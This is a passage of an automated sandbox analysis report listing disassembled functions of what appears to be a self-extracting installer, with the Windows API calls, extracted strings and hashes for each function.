                                                            Uniqueness Score: -1.00%

                                                            Function 0040230A Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 206threadprocesssynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCommandLineW.KERNEL32(?,?), ref: 00402328
                                                            • GetStartupInfoW.KERNEL32(00000044,?,?,?,?,?,?,?,?,?,00000000), ref: 00402464
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 0040248B
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00402495
                                                            • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 004024A6
                                                            • AssignProcessToJobObject.KERNEL32(00000000,?), ref: 004024BC
                                                            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 004024CC
                                                            • SetInformationJobObject.KERNEL32(00000000,00000007,00000000,00000008), ref: 004024EB
                                                            • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004024F4
                                                            • GetQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040250D
                                                            • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040251A
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 00402521
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402530
                                                            • GetExitCodeProcess.KERNEL32(?,00000000), ref: 00402539
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00402543
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040254F
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00402556
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040255D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
                                                            • String ID: " -$D$sfxwaitall
                                                            • API String ID: 47019888-3949692445
                                                            • Opcode ID: 519d106e2b0a223b42b0a0e9393a5e42500ebc3d267b09adf0e792919cd882f7
                                                            • Instruction ID: d07c1fe03d4e63aac37c172aa7c053648cbb61115795265560bf311325c78a5a
                                                            • Opcode Fuzzy Hash: 519d106e2b0a223b42b0a0e9393a5e42500ebc3d267b09adf0e792919cd882f7
                                                            • Instruction Fuzzy Hash: 95619072900119FBCF21AFA1DD59EDEBB7DAF04304F00006AF505B21A1DB399E45DBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00408775 Relevance: 36.3, APIs: 24, Instructions: 267windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,00000065), ref: 00408798
                                                            • LoadIconW.USER32(00000000), ref: 0040879F
                                                            • GetSystemMetrics.USER32(00000032), ref: 004087B1
                                                            • GetSystemMetrics.USER32(00000031), ref: 004087B6
                                                            • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 004087BF
                                                            • LoadImageW.USER32(00000000), ref: 004087C6
                                                            • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 004087E4
                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004087F1
                                                              • Part of subcall function 00409517: GetDlgItem.USER32(?,?), ref: 00409523
                                                              • Part of subcall function 00409517: GetWindowTextLengthW.USER32(00000000), ref: 0040952A
                                                              • Part of subcall function 00409517: GetDlgItem.USER32(?,?), ref: 0040953D
                                                              • Part of subcall function 00409D11: GetDlgItem.USER32(?,?), ref: 00409D20
                                                              • Part of subcall function 00409D11: ShowWindow.USER32(00000000,?,?,00408A44,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00409D38
                                                              • Part of subcall function 004096E4: GetDlgItem.USER32(?,000004B3), ref: 004096FA
                                                              • Part of subcall function 004096E4: SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 0040970C
                                                              • Part of subcall function 004096E4: GetDlgItem.USER32(?,000004B4), ref: 00409716
                                                              • Part of subcall function 004096E4: SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00409722
                                                              • Part of subcall function 004096E4: SendMessageW.USER32(?,00000401,?,00000000), ref: 00409731
                                                              • Part of subcall function 004096E4: GetDlgItem.USER32(?,?), ref: 00409739
                                                              • Part of subcall function 004096E4: SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00409745
                                                              • Part of subcall function 004096E4: GetDlgItem.USER32(?,?), ref: 0040974D
                                                              • Part of subcall function 004096E4: SetFocus.USER32(00000000,?,?,004088F9,000004B4,000004B3,00000000,000004B4,00000000,?,00000000), ref: 00409750
                                                              • Part of subcall function 00405296: SetWindowTextW.USER32(?,?), ref: 004052F7
                                                              • Part of subcall function 0040501D: GetClassNameA.USER32(?,?,00000040), ref: 0040502E
                                                              • Part of subcall function 0040501D: lstrcmpiA.KERNEL32(?,STATIC), ref: 00405045
                                                              • Part of subcall function 0040501D: GetWindowLongW.USER32(?,000000F0), ref: 00405056
                                                              • Part of subcall function 0040501D: GetParent.USER32(?), ref: 0040508B
                                                              • Part of subcall function 0040501D: LoadLibraryA.KERNEL32(riched20), ref: 004050A0
                                                              • Part of subcall function 0040501D: GetMenu.USER32(?), ref: 004050B3
                                                              • Part of subcall function 0040501D: SetThreadLocale.KERNEL32(00000419), ref: 004050C0
                                                              • Part of subcall function 0040501D: CreateWindowExW.USER32(00000000,RichEdit20W,00426A08,50000804,?,?,?,?,00000000,00000000,00000000,00000000), ref: 004050F0
                                                              • Part of subcall function 0040501D: DestroyWindow.USER32(?), ref: 004050FD
                                                              • Part of subcall function 0040501D: SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00405114
                                                              • Part of subcall function 0040501D: GetSysColor.USER32(0000000F), ref: 00405118
                                                              • Part of subcall function 0040501D: SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00405126
                                                            • GetDlgItem.USER32(?,000004B2), ref: 0040880D
                                                            • GetDlgItem.USER32(?,000004B2), ref: 00408819
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00408820
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00408835
                                                            • GetDlgItem.USER32(?,000004B5), ref: 00408842
                                                            • GetDlgItem.USER32(?,000004B5), ref: 00408852
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0040885D
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0040886C
                                                            • GetDlgItem.USER32(?,000004B2), ref: 00408882
                                                            • GetWindow.USER32(?,00000005), ref: 00408967
                                                            • GetWindow.USER32(?,00000005), ref: 00408984
                                                            • GetWindow.USER32(?,00000005), ref: 0040899D
                                                            • GetModuleHandleW.KERNEL32(00000000,00000065,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00408A01
                                                            • LoadIconW.USER32(00000000), ref: 00408A08
                                                            • GetDlgItem.USER32(?,000004B1), ref: 00408A27
                                                            • SendMessageW.USER32(00000000), ref: 00408A2A
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ItemWindow$MessageSend$Long$Load$HandleModule$IconMetricsSystemText$ClassColorCreateDestroyFocusImageLengthLibraryLocaleMenuNameParentShowThreadlstrcmpi
                                                            • String ID:
                                                            • API String ID: 2214986222-0
                                                            • Opcode ID: 7fd6932fe6cca15c4ee686813854d8b55db11633241cb19239945a832f2ff248
                                                            • Instruction ID: 9656eec94e405c0b108459c1a77cb82316b0959b4e2574c875368f18e2710560
                                                            • Opcode Fuzzy Hash: 7fd6932fe6cca15c4ee686813854d8b55db11633241cb19239945a832f2ff248
                                                            • Instruction Fuzzy Hash: 4681C671340300BBEB256B358D4AF3A3A599B84714F15413EFA45BA2D3CEBCDC419A6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004034A5 Relevance: 31.6, APIs: 21, Instructions: 124windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowDC.USER32(00000000), ref: 004034B1
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 004034BF
                                                            • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 004034D2
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00403505
                                                            • MulDiv.KERNEL32(?,00000003,00000002), ref: 00403510
                                                            • MulDiv.KERNEL32(?,00000003,00000002), ref: 0040351E
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0040352D
                                                            • CreateCompatibleDC.GDI32(?), ref: 00403537
                                                            • SelectObject.GDI32(00000000,?), ref: 00403546
                                                            • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 00403551
                                                            • SelectObject.GDI32(?,00000000), ref: 0040355B
                                                            • SetStretchBltMode.GDI32(?,00000004), ref: 00403564
                                                            • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 00403586
                                                            • GetCurrentObject.GDI32(?,00000007), ref: 0040358F
                                                            • SelectObject.GDI32(?,00000000), ref: 004035A1
                                                            • SelectObject.GDI32(?,00000000), ref: 004035A7
                                                            • DeleteDC.GDI32(?), ref: 004035B2
                                                            • DeleteDC.GDI32(?), ref: 004035B7
                                                            • ReleaseDC.USER32(00000000,?), ref: 004035BE
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 004035CA
                                                            • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 004035D7
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                            • String ID:
                                                            • API String ID: 3462224810-0
                                                            • Opcode ID: 704d556ecdb921b839245c81cbd8a863f31ae5f133d9a697757a32f26faadb78
                                                            • Instruction ID: 144cda3e4f69d34a0b69556aae64c70ba98a8bde5f6656ab8f4a62d059b324a1
                                                            • Opcode Fuzzy Hash: 704d556ecdb921b839245c81cbd8a863f31ae5f133d9a697757a32f26faadb78
                                                            • Instruction Fuzzy Hash: CF414C71A00218BFDF319FA1DC49EAF7F79FF08761F510065FA05A61A0C6354A51EBA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004060A2 Relevance: 30.2, APIs: 1, Strings: 19, Instructions: 209stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrcmpiW.KERNEL32(00000000,00427A14), ref: 00406182
                                                              • Part of subcall function 004041E0: GetLastError.KERNEL32 ref: 00404227
                                                              • Part of subcall function 004041E0: wsprintfW.USER32 ref: 00404238
                                                              • Part of subcall function 004041E0: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00404247
                                                              • Part of subcall function 004041E0: GetLastError.KERNEL32 ref: 00404252
                                                              • Part of subcall function 004041E0: GetEnvironmentVariableW.KERNEL32(?,00000000,0000002D), ref: 0040427C
                                                              • Part of subcall function 004041E0: GetLastError.KERNEL32 ref: 00404287
                                                              • Part of subcall function 004041E0: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00404299
                                                              • Part of subcall function 004041E0: SetLastError.KERNEL32(00401877), ref: 004042CD
                                                              • Part of subcall function 004041E0: lstrlenA.KERNEL32(00426DB8), ref: 00404303
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$EnvironmentVariablelstrcmpi$lstrlenwsprintf
                                                            • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$PasswordText$PasswordTitle$Progress$Title$WarningTitle$X]n
                                                            • API String ID: 2247831197-3525894635
                                                            • Opcode ID: 31eb57f1143eb308704bae98bc2cb1a1f499bc4d5c3bf4a2c1d3cbaf822fcb56
                                                            • Instruction ID: d04aef037a93914b7a9787fb7c01cd5394099a443c1f6d09b2a032840ec7ae63
                                                            • Opcode Fuzzy Hash: 31eb57f1143eb308704bae98bc2cb1a1f499bc4d5c3bf4a2c1d3cbaf822fcb56
                                                            • Instruction Fuzzy Hash: C15174B1700314AEE704BB76BD63A3A329DDA85B48B65153FF901A72D1DBBC8D008B5C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040501D Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 123windowlibrarystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClassNameA.USER32(?,?,00000040), ref: 0040502E
                                                            • lstrcmpiA.KERNEL32(?,STATIC), ref: 00405045
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00405056
                                                              • Part of subcall function 004047FA: GetWindowTextLengthW.USER32(?), ref: 0040480C
                                                              • Part of subcall function 004047FA: GetWindowTextW.USER32(?,00000000,00000001), ref: 00404828
                                                            • GetParent.USER32(?), ref: 0040508B
                                                            • LoadLibraryA.KERNEL32(riched20), ref: 004050A0
                                                              • Part of subcall function 0040407A: GetParent.USER32(?), ref: 00404081
                                                              • Part of subcall function 0040407A: GetWindowRect.USER32(?,?), ref: 00404095
                                                              • Part of subcall function 0040407A: ScreenToClient.USER32(00000000,?), ref: 0040409D
                                                              • Part of subcall function 0040407A: ScreenToClient.USER32(00000000,?), ref: 004040A8
                                                            • GetMenu.USER32(?), ref: 004050B3
                                                            • SetThreadLocale.KERNEL32(00000419), ref: 004050C0
                                                            • CreateWindowExW.USER32(00000000,RichEdit20W,00426A08,50000804,?,?,?,?,00000000,00000000,00000000,00000000), ref: 004050F0
                                                            • DestroyWindow.USER32(?), ref: 004050FD
                                                            • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00405114
                                                            • GetSysColor.USER32(0000000F), ref: 00405118
                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00405126
                                                              • Part of subcall function 00405873: WideCharToMultiByte.KERNEL32(?,00000000,?,?,00000000,?,?,00000000,00000000,?,?,?,?,00401E30,?,?), ref: 004058AA
                                                            • SendMessageW.USER32(00000000,00000461,?,?), ref: 00405151
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$ClientParentScreenText$ByteCharClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuMultiNameRectThreadWidelstrcmpi
                                                            • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                            • API String ID: 1365818316-2281146334
                                                            • Opcode ID: 59383b6c14ab3c31e4b2c1aada10c14020c5782b2597169ac30afe4c17b31a18
                                                            • Instruction ID: 0bfea91ec2faae2404602870067ebb494671179ff6f46fd41a811550d14ae0cd
                                                            • Opcode Fuzzy Hash: 59383b6c14ab3c31e4b2c1aada10c14020c5782b2597169ac30afe4c17b31a18
                                                            • Instruction Fuzzy Hash: 3E3193B1A00219BFDB10ABF5DC49EBF7BBCEB48710F51003AF601B6190D67899019B69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00408B1C Relevance: 28.6, APIs: 19, Instructions: 147windowcomtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00409D11: GetDlgItem.USER32(?,?), ref: 00409D20
                                                              • Part of subcall function 00409D11: ShowWindow.USER32(00000000,?,?,00408A44,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00409D38
                                                            • GetDlgItem.USER32(?,000004B8), ref: 00408B4B
                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408B5B
                                                            • GetDlgItem.USER32(?,000004B4), ref: 00408B85
                                                              • Part of subcall function 004099F0: SetWindowTextW.USER32(?,00000000), ref: 004099F9
                                                              • Part of subcall function 00409899: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004098D1
                                                              • Part of subcall function 00409899: GetDlgItem.USER32(?,000004B8), ref: 004098EE
                                                              • Part of subcall function 00409899: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 004098FD
                                                              • Part of subcall function 00409899: wsprintfW.USER32 ref: 0040991B
                                                              • Part of subcall function 00409899: GetDlgItem.USER32(?,000004B5), ref: 00409939
                                                              • Part of subcall function 00408775: GetModuleHandleW.KERNEL32(00000000,00000065), ref: 00408798
                                                              • Part of subcall function 00408775: LoadIconW.USER32(00000000), ref: 0040879F
                                                              • Part of subcall function 00408775: GetSystemMetrics.USER32(00000032), ref: 004087B1
                                                              • Part of subcall function 00408775: GetSystemMetrics.USER32(00000031), ref: 004087B6
                                                              • Part of subcall function 00408775: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 004087BF
                                                              • Part of subcall function 00408775: LoadImageW.USER32(00000000), ref: 004087C6
                                                              • Part of subcall function 00408775: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 004087E4
                                                              • Part of subcall function 00408775: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004087F1
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B2), ref: 0040880D
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B2), ref: 00408819
                                                              • Part of subcall function 00408775: GetWindowLongW.USER32(00000000,000000F0), ref: 00408820
                                                              • Part of subcall function 00408775: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00408835
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B5), ref: 00408842
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B5), ref: 00408852
                                                              • Part of subcall function 00408775: GetWindowLongW.USER32(00000000,000000F0), ref: 0040885D
                                                              • Part of subcall function 00408775: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0040886C
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B2), ref: 00408882
                                                            • GetDlgItem.USER32(?,000004B5), ref: 00408BAE
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00408BB3
                                                            • GetDlgItem.USER32(?,000004B5), ref: 00408BC7
                                                            • SetWindowLongW.USER32(00000000), ref: 00408BCA
                                                            • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00408BF1
                                                            • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408C03
                                                            • GetDlgItem.USER32(?,000004B4), ref: 00408C11
                                                            • SetFocus.USER32(00000000), ref: 00408C14
                                                            • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408C40
                                                            • CoCreateInstance.OLE32(00428EF4,00000000,00000001,00427EA4,00000000), ref: 00408C6C
                                                            • GetDlgItem.USER32(?,00000002), ref: 00408C8D
                                                            • IsWindow.USER32(00000000), ref: 00408C90
                                                            • GetDlgItem.USER32(?,00000002), ref: 00408CA0
                                                            • EnableWindow.USER32(00000000), ref: 00408CA3
                                                            • GetDlgItem.USER32(?,000004B5), ref: 00408CBB
                                                            • ShowWindow.USER32(00000000), ref: 00408CBE
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Item$Window$Long$MessageSend$System$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTextTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                            • String ID:
                                                            • API String ID: 3521167636-0
                                                            • Opcode ID: fa13f10d23603a3b63cc2f8f2eccc8955f7baacab2cdd4233207b11c06167aac
                                                            • Instruction ID: de3640bd3f08e21a2b23cc6cc41f7c899de82941e7324de98f9a14cd13793bc5
                                                            • Opcode Fuzzy Hash: fa13f10d23603a3b63cc2f8f2eccc8955f7baacab2cdd4233207b11c06167aac
                                                            • Instruction Fuzzy Hash: 6A4187B0740744BFEA206B21DE4AF1B7AADEF40B08F01453DF541A62E1CB799C41CA2C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040560D Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 122windowcommemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClassNameA.USER32(?,?,00000040), ref: 00405620
                                                            • lstrcmpiA.KERNEL32(?,STATIC), ref: 00405637
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00405648
                                                            • GetMenu.USER32(?), ref: 0040565B
                                                              • Part of subcall function 00404C1A: GetModuleHandleW.KERNEL32(00000000), ref: 00404C25
                                                              • Part of subcall function 00404C1A: FindResourceExA.KERNEL32(00000000,?,?), ref: 00404C42
                                                              • Part of subcall function 00404C1A: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00404C56
                                                              • Part of subcall function 00404C1A: SizeofResource.KERNEL32(00000000,00000000), ref: 00404C67
                                                              • Part of subcall function 00404C1A: LoadResource.KERNEL32(00000000,00000000), ref: 00404C71
                                                              • Part of subcall function 00404C1A: LockResource.KERNEL32(00000000), ref: 00404C7C
                                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00405688
                                                            • CoInitialize.OLE32(00000000), ref: 004056A8
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 004056B4
                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00428ED4,?), ref: 004056D9
                                                            • GlobalFree.KERNEL32(00000000), ref: 004056E9
                                                              • Part of subcall function 004034A5: GetWindowDC.USER32(00000000), ref: 004034B1
                                                              • Part of subcall function 004034A5: GetDeviceCaps.GDI32(00000000,00000058), ref: 004034BF
                                                              • Part of subcall function 004034A5: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 004034D2
                                                              • Part of subcall function 004034A5: GetObjectW.GDI32(?,00000018,?), ref: 00403505
                                                              • Part of subcall function 004034A5: MulDiv.KERNEL32(?,00000003,00000002), ref: 00403510
                                                              • Part of subcall function 004034A5: MulDiv.KERNEL32(?,00000003,00000002), ref: 0040351E
                                                              • Part of subcall function 004034A5: CreateCompatibleDC.GDI32(00000000), ref: 0040352D
                                                              • Part of subcall function 004034A5: CreateCompatibleDC.GDI32(?), ref: 00403537
                                                              • Part of subcall function 004034A5: SelectObject.GDI32(00000000,?), ref: 00403546
                                                              • Part of subcall function 004034A5: CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 00403551
                                                              • Part of subcall function 004034A5: SelectObject.GDI32(?,00000000), ref: 0040355B
                                                              • Part of subcall function 004034A5: SetStretchBltMode.GDI32(?,00000004), ref: 00403564
                                                              • Part of subcall function 004034A5: StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 00403586
                                                              • Part of subcall function 004034A5: GetCurrentObject.GDI32(?,00000007), ref: 0040358F
                                                              • Part of subcall function 004034A5: SelectObject.GDI32(?,00000000), ref: 004035A1
                                                              • Part of subcall function 004034A5: SelectObject.GDI32(?,00000000), ref: 004035A7
                                                              • Part of subcall function 004034A5: DeleteDC.GDI32(?), ref: 004035B2
                                                              • Part of subcall function 004034A5: DeleteDC.GDI32(?), ref: 004035B7
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0040571B
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 0040572D
                                                            • SendMessageW.USER32(?,00000172,00000000,?), ref: 0040573D
                                                            • GlobalFree.KERNEL32(00000000), ref: 00405752
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureSendSizeofStreamlstrcmpi
                                                            • String ID: IMAGES$STATIC
                                                            • API String ID: 3592854226-1168396491
                                                            • Opcode ID: 879934391142338f4c0ae6713a3d598d47aba0d21ac4b5037d1314ce2996c6d0
                                                            • Instruction ID: 5b24117ceed79abb5443b993532156610a81d6d7970d1e29ea56a9cef343aa67
                                                            • Opcode Fuzzy Hash: 879934391142338f4c0ae6713a3d598d47aba0d21ac4b5037d1314ce2996c6d0
                                                            • Instruction Fuzzy Hash: 07411A71A00208FFDB11ABA0DC88EAF77BCEF49705F51407AF601A6190D7799E46DB29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00409013 Relevance: 24.3, APIs: 16, Instructions: 296COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000004B3), ref: 00409036
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0040903F
                                                            • GetDlgItem.USER32(?,000004B4), ref: 00409082
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0040908B
                                                            • GetSystemMetrics.USER32(00000010), ref: 00409114
                                                            • GetSystemMetrics.USER32(00000011), ref: 0040911A
                                                            • GetSystemMetrics.USER32(00000008), ref: 00409120
                                                            • GetSystemMetrics.USER32(00000007), ref: 0040912B
                                                            • GetParent.USER32(?), ref: 00409150
                                                            • GetClientRect.USER32(00000000,?), ref: 00409161
